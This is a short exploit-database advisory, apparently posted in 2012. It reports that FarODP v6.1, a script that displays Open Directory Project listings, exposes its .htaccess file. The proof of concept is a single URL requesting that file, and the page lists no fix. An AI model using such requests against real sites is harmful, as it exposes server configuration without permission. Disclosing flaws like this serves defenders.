FarODP v6.1 Remote File Disclosure Vulnerability (.htaccess)

2012-11-16 16:05:02

# Exploit Title: FarODP V6.1 Remote File Disclosure Vulnerability (.htaccess)
# Date: 15.10.201
# Exploit Author: d3b4g
# Vendor Homepage: http://www.farfarfar.com/scripts/odp/
# Software Link: http://www.farfarfar.com/dir/
# Tested on: Windows 7
# Blog: d3b4g.me
# twitter: @schaba




----------------------------------------------------------------------------------
Script Description:
-------------------

What is FarODP?

Get live data from the Open Directory Project to your own website. Let visitors
browse and search categories of websites. This script is easy to install; just upload
this script to your server. You can easily customize the layout by editing the templates.
It supports thumbnails of websites, caching, filter adult categories and searches, foreign
language support, search engine friendly mode, and URL rewriting.


() Proof of Concept:


http://localhost/path/.htaccess






() Previous versions might be vulnerable



-end-

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.